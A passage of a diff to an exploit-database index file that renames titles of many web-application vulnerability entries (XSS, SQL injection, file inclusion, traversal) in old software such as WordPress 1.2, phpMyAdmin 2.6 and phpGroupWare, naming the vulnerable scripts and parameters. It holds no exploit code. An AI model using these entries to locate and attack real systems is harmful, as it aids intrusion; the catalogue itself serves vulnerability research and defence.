File Read",2013-03-07,"Sergey Bobrov",cgi,webapps,0 24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - PHP Remote File Inclusion",2004-09-27,"Himeur Nourredine",php,webapps,0 -24641,platforms/php/webapps/24641.txt,"WordPress 1.2 - 'wp-login.php' Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24641,platforms/php/webapps/24641.txt,"WordPress 1.2 - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2004-09-28,"Thomas Waldegger",php,webapps,0 24642,platforms/php/webapps/24642.txt,"WordPress 1.2 - 'admin-header.php' redirect_url Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24643,platforms/php/webapps/24643.txt,"WordPress 1.2 - 'bookmarklet.php' Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24643,platforms/php/webapps/24643.txt,"WordPress 1.2 - 'bookmarklet.php' Multiple Cross-Site Scripting Vulnerabilities",2004-09-28,"Thomas Waldegger",php,webapps,0 24644,platforms/php/webapps/24644.txt,"WordPress 1.2 - 'categories.php' cat_ID Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 24645,platforms/php/webapps/24645.txt,"WordPress 1.2 - 'edit.php' s Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 -24646,platforms/php/webapps/24646.txt,"WordPress 1.2 - 'edit-comments.php' Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0 +24646,platforms/php/webapps/24646.txt,"WordPress 1.2 - 'edit-comments.php' Multiple Cross-Site Scripting Vulnerabilities",2004-09-28,"Thomas Waldegger",php,webapps,0 24647,platforms/php/webapps/24647.txt,"Parachat 5.5 - Directory Traversal",2004-09-28,"Donato Ferrante",php,webapps,0 -24648,platforms/php/webapps/24648.txt,"W-Agora 4.1.6 - a redir_url.php key Parameter SQL Injection",2004-09-30,"Alexander Antipov",php,webapps,0 -24649,platforms/php/webapps/24649.txt,"W-Agora 4.1.6 - a forgot_password.php userid Parameter Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 -24650,platforms/php/webapps/24650.txt,"W-Agora 4.1.6 - a download_thread.php thread Parameter Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 +24648,platforms/php/webapps/24648.txt,"W-Agora 4.1.6 - 'a redir_url.php?key' SQL Injection",2004-09-30,"Alexander Antipov",php,webapps,0 +24649,platforms/php/webapps/24649.txt,"W-Agora 4.1.6 - 'a forgot_password.php?userid' Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 +24650,platforms/php/webapps/24650.txt,"W-Agora 4.1.6 - 'a download_thread.php?thread' Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 24651,platforms/php/webapps/24651.txt,"W-Agora 4.1.6 - a subscribe_thread.php HTTP Response Splitting",2004-09-30,"Alexander Antipov",php,webapps,0 24652,platforms/php/webapps/24652.txt,"W-Agora 4.1.6 - a 'login.php' loginuser Parameter Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 24655,platforms/php/webapps/24655.txt,"PHPLinks 2.1.x - Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",php,webapps,0 24657,platforms/php/webapps/24657.txt,"BlackBoard Internet NewsBoard System 1.5.1 - Remote File Inclusion",2004-10-06,"Lin Xiaofeng",php,webapps,0 -24659,platforms/php/webapps/24659.txt,"DCP-Portal 3.7/4.x/5.x - 'calendar.php' Multiple Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 -24660,platforms/php/webapps/24660.txt,"DCP-Portal 3.7/4.x/5.x - 'index.php' Multiple Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 -24661,platforms/php/webapps/24661.txt,"DCP-Portal 3.7/4.x/5.x - 'announcement.php cid' Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 -24662,platforms/php/webapps/24662.txt,"DCP-Portal 3.7/4.x/5.x - 'news.php cid' Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 -24663,platforms/php/webapps/24663.txt,"DCP-Portal 3.7/4.x/5.x - 'contents.php cid' Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 +24659,platforms/php/webapps/24659.txt,"DCP-Portal 3.7/4.x/5.x - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0 +24660,platforms/php/webapps/24660.txt,"DCP-Portal 3.7/4.x/5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0 +24661,platforms/php/webapps/24661.txt,"DCP-Portal 3.7/4.x/5.x - 'announcement.php?cid' Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 +24662,platforms/php/webapps/24662.txt,"DCP-Portal 3.7/4.x/5.x - 'news.php?cid' Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 +24663,platforms/php/webapps/24663.txt,"DCP-Portal 3.7/4.x/5.x - 'contents.php?cid' Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0 24664,platforms/php/webapps/24664.txt,"DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0 24665,platforms/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x - 'calendar.php' HTTP Response Splitting",2004-10-06,"Alexander Antipov",php,webapps,0 24666,platforms/asp/webapps/24666.txt,"Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access",2004-10-06,anonymous,asp,webapps,0 24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - 'wp-login.php' HTTP Response Splitting",2004-10-07,"Chaotic Evil",php,webapps,0 24670,platforms/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps,0 -24671,platforms/asp/webapps/24671.txt,"DUclassified 4.x - 'adDetail.asp' Multiple Parameter SQL Injections",2004-10-11,"Soroosh Dalili",asp,webapps,0 +24671,platforms/asp/webapps/24671.txt,"DUclassified 4.x - 'adDetail.asp' Multiple SQL Injections",2004-10-11,"Soroosh Dalili",asp,webapps,0 24672,platforms/asp/webapps/24672.txt,"DUclassmate 1.x - 'account.asp MM-recordId' Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",asp,webapps,0 24673,platforms/asp/webapps/24673.txt,"DUforum 3.x - Login Form Password Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - 'messages.asp FOR_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 @@ -27864,15 +27865,15 @@ id,file,description,date,author,platform,type,port 24922,platforms/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",multiple,webapps,0 24889,platforms/php/webapps/24889.txt,"WordPress Plugin Mathjax Latex 1.1 - Cross-Site Request Forgery",2013-03-26,"Junaid Hussain",php,webapps,0 24717,platforms/asp/webapps/24717.txt,"WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities",2004-11-02,"Behrang Fouladi",asp,webapps,0 -24718,platforms/php/webapps/24718.txt,"Goolery 0.3 - viewpic.php conversation_id Parameter Cross-Site Scripting",2004-11-02,Lostmon,php,webapps,0 -24719,platforms/php/webapps/24719.txt,"Goolery 0.3 - viewalbum.php page Parameter Cross-Site Scripting",2004-11-02,Lostmon,php,webapps,0 +24718,platforms/php/webapps/24718.txt,"Goolery 0.3 - 'viewpic.php?conversation_id' Cross-Site Scripting",2004-11-02,Lostmon,php,webapps,0 +24719,platforms/php/webapps/24719.txt,"Goolery 0.3 - 'viewalbum.php?page' Cross-Site Scripting",2004-11-02,Lostmon,php,webapps,0 24921,platforms/php/webapps/24921.txt,"OpenCart - Cross-Site Request Forgery (Change User Password)",2013-04-08,"Saadi Siddiqui",php,webapps,0 24722,platforms/cgi/webapps/24722.txt,"TIPS MailPost 5.1.1 - Error Message Cross-Site Scripting",2004-11-03,Procheckup,cgi,webapps,0 24723,platforms/cgi/webapps/24723.txt,"TIPS MailPost 5.1.1 - Remote File Enumeration",2004-11-03,"Gemma Hughes",cgi,webapps,0 24729,platforms/php/webapps/24729.txt,"webcalendar 0.9.x - Multiple Vulnerabilities",2004-11-10,"Joxean Koret",php,webapps,0 24731,platforms/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",php,webapps,0 24732,platforms/php/webapps/24732.txt,"Phorum 5.0.x - FOLLOW.php SQL Injection",2004-11-11,"Janek Vind",php,webapps,0 -24734,platforms/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 - send.php tid Parameter Cross-Site Scripting",2004-11-12,"digital ex",php,webapps,0 +24734,platforms/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 - 'send.php?tid' Cross-Site Scripting",2004-11-12,"digital ex",php,webapps,0 24735,platforms/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 - send.php Arbitrary Message Access",2004-11-12,"digital ex",php,webapps,0 24736,platforms/php/webapps/24736.txt,"phpWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting",2004-11-04,"Maestro De-Seguridad",php,webapps,0 24737,platforms/php/webapps/24737.txt,"Mark Zuckerberg Thefacebook - Multiple Cross-Site Scripting Vulnerabilities",2004-11-13,"Alex Lanstein",php,webapps,0 @@ -27913,12 +27914,12 @@ id,file,description,date,author,platform,type,port 24821,platforms/php/webapps/24821.txt,"PHPGedView 2.5/2.6 - Gedrecord.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24822,platforms/php/webapps/24822.txt,"PHPGedView 2.5/2.6 - Gdbi_interface.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24823,platforms/php/webapps/24823.txt,"sugarsales 1.x/2.0 - Multiple Vulnerabilities",2004-12-13,"Daniel Fabian",php,webapps,0 -24824,platforms/php/webapps/24824.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php Cat' Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 -24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php Cat' Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 -24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php Cat' Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 -24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php Cat' Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24824,platforms/php/webapps/24824.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php?Cat' Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php?Cat' Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php?Cat' Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php?Cat' Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 24829,platforms/php/webapps/24829.txt,"PHPGedView 2.5/2.6 - 'login.php' URL Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24830,platforms/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - 'login.php Username' Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24830,platforms/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - 'login.php?Username' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24831,platforms/php/webapps/24831.txt,"PHPGedView 2.5/2.6 - 'login.php' Newlanguage Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24832,platforms/php/webapps/24832.txt,"PHPGedView 2.5/2.6 - Relationship.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24834,platforms/php/webapps/24834.txt,"PHPGedView 2.5/2.6 - calendar.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 @@ -27928,17 +27929,17 @@ id,file,description,date,author,platform,type,port 24838,platforms/asp/webapps/24838.txt,"Active Server Corner ASP Calendar 1.0 - Administrative Access",2004-12-14,"ali reza AcTiOnSpIdEr",asp,webapps,0 24840,platforms/asp/webapps/24840.txt,"ASP-Rider - SQL Injection",2004-12-14,"Shervin Khaleghjou",asp,webapps,0 24842,platforms/php/webapps/24842.txt,"IWebNegar - Multiple SQL Injections",2004-12-15,"Shervin Khaleghjou",php,webapps,0 -24844,platforms/php/webapps/24844.txt,"phpGroupWare 0.9.x - 'index.php' Multiple Parameter Cross-Site Scripting",2004-12-15,"James Bercegay",php,webapps,0 -24845,platforms/php/webapps/24845.txt,"phpGroupWare 0.9.x - viewticket_details.php ticket_id Parameter Cross-Site Scripting",2004-12-15,"James Bercegay",php,webapps,0 -24846,platforms/php/webapps/24846.txt,"phpGroupWare 0.9.x - viewticket_details.php ticket_id Parameter SQL Injection",2004-12-15,"James Bercegay",php,webapps,0 -24847,platforms/php/webapps/24847.txt,"phpGroupWare 0.9.x - 'index.php' Multiple Parameter SQL Injection",2004-12-15,"James Bercegay",php,webapps,0 +24844,platforms/php/webapps/24844.txt,"phpGroupWare 0.9.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-15,"James Bercegay",php,webapps,0 +24845,platforms/php/webapps/24845.txt,"phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' Cross-Site Scripting",2004-12-15,"James Bercegay",php,webapps,0 +24846,platforms/php/webapps/24846.txt,"phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' SQL Injection",2004-12-15,"James Bercegay",php,webapps,0 +24847,platforms/php/webapps/24847.txt,"phpGroupWare 0.9.x - 'index.php' Multiple SQL Injections",2004-12-15,"James Bercegay",php,webapps,0 24849,platforms/php/webapps/24849.txt,"DaloRadius - Multiple Vulnerabilities",2013-03-18,"Saadi Siddiqui",php,webapps,0 24850,platforms/php/webapps/24850.txt,"WordPress Plugin Simply Poll 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps,0 -24851,platforms/php/webapps/24851.txt,"Joomla! Component com_rsfiles - 'cid' Parameter SQL Injection",2013-03-18,ByEge,php,webapps,0 +24851,platforms/php/webapps/24851.txt,"Joomla! Component com_rsfiles - 'cid' SQL Injection",2013-03-18,ByEge,php,webapps,0 24858,platforms/php/webapps/24858.html,"WordPress Plugin Occasions 1.0.4 - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 24859,platforms/php/webapps/24859.rb,"WordPress Plugin Count Per Day 3.2.5 - 'counter.php' Cross-Site Scripting",2013-03-19,m3tamantra,php,webapps,0 24860,platforms/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - Cross-Site Request Forgery",2013-03-19,"Jacob Holcomb",hardware,webapps,0 -24861,platforms/php/webapps/24861.txt,"Rebus:list - 'list.php list_id' Parameter SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 +24861,platforms/php/webapps/24861.txt,"Rebus:list - 'list.php?list_id' SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple Cross-Site Scripting Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0 24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - 'Username'/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0 24867,platforms/php/webapps/24867.html,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0 @@ -27949,14 +27950,14 @@ id,file,description,date,author,platform,type,port 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24877,platforms/php/webapps/24877.txt,"OpenCart 1.5.5.1 - 'FileManager.php' Directory Traversal Arbitrary File Access",2013-03-22,waraxe,php,webapps,0 24879,platforms/php/webapps/24879.txt,"Free Hosting Manager 2.0.2 - Multiple SQL Injections",2013-03-25,"Saadi Siddiqui",php,webapps,0 -24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 - 'gid' Parameter Blind SQL Injection",2013-03-25,Esac,php,webapps,0 +24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 - 'gid' Blind SQL Injection",2013-03-25,Esac,php,webapps,0 24882,platforms/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps,0 24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)",2013-03-25,bwall,php,webapps,0 24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - 'awards.php' Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilities",2013-03-27,Esac,php,webapps,0 -24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php loginid' Parameter SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 +24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php?loginid' SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 -24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - 'importer.php what' Parameter Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 +24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - 'importer.php?what' Directory Traversal",2013-03-29,"High-Tech Bridge SA",php,webapps,0 24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - 'index.php p' Paramete' Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 24914,platforms/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0 @@ -27967,13 +27968,13 @@ id,file,description,date,author,platform,type,port 24927,platforms/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,php,webapps,0 24928,platforms/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - Cross-Site Request Forgery",2013-04-08,Un0wn_X,hardware,webapps,0 24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0 -24934,platforms/php/webapps/24934.txt,"WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php hash' Parameter SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 +24934,platforms/php/webapps/24934.txt,"WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php?hash' SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0 24969,platforms/php/webapps/24969.txt,"Joomla! Component com_civicrm 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0 24942,platforms/php/webapps/24942.txt,"ZAPms 1.41 - SQL Injection",2013-04-09,NoGe,php,webapps,0 27434,platforms/php/webapps/27434.txt,"Oxynews - 'index.php' SQL Injection",2006-03-16,R00T3RR0R,php,webapps,0 27435,platforms/php/webapps/27435.txt,"phpMyAdmin 2.8.1 - Set_Theme Cross-Site Scripting",2006-03-16,"Ali Asad",php,webapps,0 -27436,platforms/php/webapps/27436.txt,"Invision Power Services Invision Board 2.0.4 - Search Action Multiple Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 +27436,platforms/php/webapps/27436.txt,"Invision Power Services Invision Board 2.0.4 - Search Action Multiple Cross-Site Scripting Vulnerabilities",2006-03-17,Mr.SNAKE,php,webapps,0 24953,platforms/php/webapps/24953.txt,"Free Monthly Websites 2.0 - Admin Password Change",2013-04-12,"Yassin Aboukir",php,webapps,0 24954,platforms/php/webapps/24954.txt,"Simple HRM System 2.3 - Multiple Vulnerabilities",2013-04-12,Doraemon,php,webapps,0 24959,platforms/php/webapps/24959.txt,"CMSLogik 1.2.1 - Multiple Vulnerabilities",2013-04-15,LiquidWorm,php,webapps,0 @@ -27992,9 +27993,9 @@ id,file,description,date,author,platform,type,port 24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 - '/wp-admin/post.ph'p content Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 24989,platforms/php/webapps/24989.txt,"WordPress 1.2.1/1.2.2 - '/wp-admin/templates.php' file Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24990,platforms/php/webapps/24990.txt,"WordPress 1.2.1/1.2.2 - 'link-add.php' Multiple Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24990,platforms/php/webapps/24990.txt,"WordPress 1.2.1/1.2.2 - 'link-add.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-16,"Thomas Waldegger",php,webapps,0 24991,platforms/php/webapps/24991.txt,"WordPress 1.2.1/1.2.2 - 'link-categories.php' cat_id Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 -24992,platforms/php/webapps/24992.txt,"WordPress 1.2.1/1.2.2 - 'link-manager.php' Multiple Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 +24992,platforms/php/webapps/24992.txt,"WordPress 1.2.1/1.2.2 - 'link-manager.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-16,"Thomas Waldegger",php,webapps,0 24993,platforms/php/webapps/24993.txt,"WordPress 1.2.1/1.2.2 - 'moderation.php' item_approved Parameter Cross-Site Scripting",2004-12-16,"Thomas Waldegger",php,webapps,0 24994,platforms/php/webapps/24994.txt,"MediaWiki 1.3.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 25184,platforms/php/webapps/25184.txt,"ProjectBB 0.4.5.1 - Multiple SQL Injections",2005-03-02,"benji lemien",php,webapps,0 @@ -28026,7 +28027,7 @@ id,file,description,date,author,platform,type,port 25064,platforms/php/webapps/25064.txt,"Magic Winmail Server 4.0 (Build 1112) - 'download.php' Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",php,webapps,0 25065,platforms/php/webapps/25065.txt,"Magic Winmail Server 4.0 (Build 1112) - 'upload.php' Traversal Arbitrary File Upload",2005-01-27,"Tan Chew Keong",php,webapps,0 25067,platforms/cgi/webapps/25067.txt,"alt-n WebAdmin 3.0.2 - Multiple Vulnerabilities",2005-01-28,"David A. P?rez",cgi,webapps,0 -25068,platforms/php/webapps/25068.txt,"IceWarp Web Mail 5.3 - login.html 'Username' Parameter Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 +25068,platforms/php/webapps/25068.txt,"IceWarp Web Mail 5.3 - login.html 'Username' Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 25069,platforms/php/webapps/25069.txt,"IceWarp Web Mail 5.3 - accountsettings_add.html accountid Parameter Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 25071,platforms/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 - Full Path Disclosure",2005-01-29,steven@lovebug.org,php,webapps,0 25074,platforms/php/webapps/25074.txt,"XOOPS Module module 3.0 - Directory Traversal",2005-01-28,Lostmon,php,webapps,0 @@ -28052,14 +28053,14 @@ id,file,description,date,author,platform,type,port 25111,platforms/php/webapps/25111.txt,"PaNews 2.0 - Cross-Site Scripting",2005-02-16,pi3ch,php,webapps,0 25112,platforms/php/webapps/25112.txt,"MercuryBoard Forum 1.0/1.1 - Cross-Site Scripting",2005-02-16,Lostmon,php,webapps,0 25113,platforms/php/webapps/25113.txt,"WebCalendar 0.9.45 - SQL Injection",2005-02-17,"Michael Scovetta",php,webapps,0 -25114,platforms/php/webapps/25114.txt,"paFaq beta4 - question.php Multiple Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 -25115,platforms/php/webapps/25115.txt,"paFaq beta4 - answer.php offset Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 -25116,platforms/php/webapps/25116.txt,"paFaq beta4 - search.php search_item Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 -25117,platforms/php/webapps/25117.txt,"paFaq beta4 - comment.php Multiple Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 -25118,platforms/php/webapps/25118.txt,"BibORB 1.3.2 - bibindex.php search Parameter Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 +25114,platforms/php/webapps/25114.txt,"paFaq beta4 - 'question.php' Multiple SQL Injections",2005-02-17,pi3ch,php,webapps,0 +25115,platforms/php/webapps/25115.txt,"paFaq beta4 - 'answer.php?offset' SQL Injection",2005-02-17,pi3ch,php,webapps,0 +25116,platforms/php/webapps/25116.txt,"paFaq beta4 - 'search.php?search_item' SQL Injection",2005-02-17,pi3ch,php,webapps,0 +25117,platforms/php/webapps/25117.txt,"paFaq beta4 - 'comment.php' Multiple SQL Injections",2005-02-17,pi3ch,php,webapps,0 +25118,platforms/php/webapps/25118.txt,"BibORB 1.3.2 - 'bibindex.php?search' Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 25119,platforms/php/webapps/25119.txt,"BibORB 1.3.2 - Add Database Description Parameter Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 25120,platforms/php/webapps/25120.txt,"BibORB 1.3.2 - 'index.php' Traversal Arbitrary File Manipulation",2005-02-17,"Patrick Hof",php,webapps,0 -25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple Parameter SQL Injections",2005-02-17,"Patrick Hof",php,webapps,0 +25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple SQL Injections",2005-02-17,"Patrick Hof",php,webapps,0 25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 - ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0 25125,platforms/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",php,webapps,0 25126,platforms/php/webapps/25126.txt,"EggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps,0 @@ -28073,11 +28074,11 @@ id,file,description,date,author,platform,type,port 25148,platforms/asp/webapps/25148.txt,"Mono 1.0.5 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-22,"Andrey Rusyaev",asp,webapps,0 25149,platforms/php/webapps/25149.txt,"iGeneric iG Shop 1.x - Multiple SQL Injections",2005-02-22,"John Cobb",php,webapps,0 25151,platforms/php/webapps/25151.txt,"PBLang Bulletin Board System 4.6 - search.php Cross-Site Scripting",2005-02-23,"Hackerlounge Research Group",php,webapps,0 -25152,platforms/php/webapps/25152.txt,"phpMyAdmin 2.6 - select_server.lib.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 -25153,platforms/php/webapps/25153.txt,"phpMyAdmin 2.6 - display_tbl_links.lib.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 -25154,platforms/php/webapps/25154.txt,"phpMyAdmin 2.6 - theme_left.css.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 -25155,platforms/php/webapps/25155.txt,"phpMyAdmin 2.6 - theme_right.css.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 -25156,platforms/php/webapps/25156.txt,"phpMyAdmin 2.6 - Multiple Local File Inclusion",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25152,platforms/php/webapps/25152.txt,"phpMyAdmin 2.6 - 'select_server.lib.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25153,platforms/php/webapps/25153.txt,"phpMyAdmin 2.6 - 'display_tbl_links.lib.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25154,platforms/php/webapps/25154.txt,"phpMyAdmin 2.6 - 'theme_left.css.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25155,platforms/php/webapps/25155.txt,"phpMyAdmin 2.6 - 'theme_right.css.php' Multiple 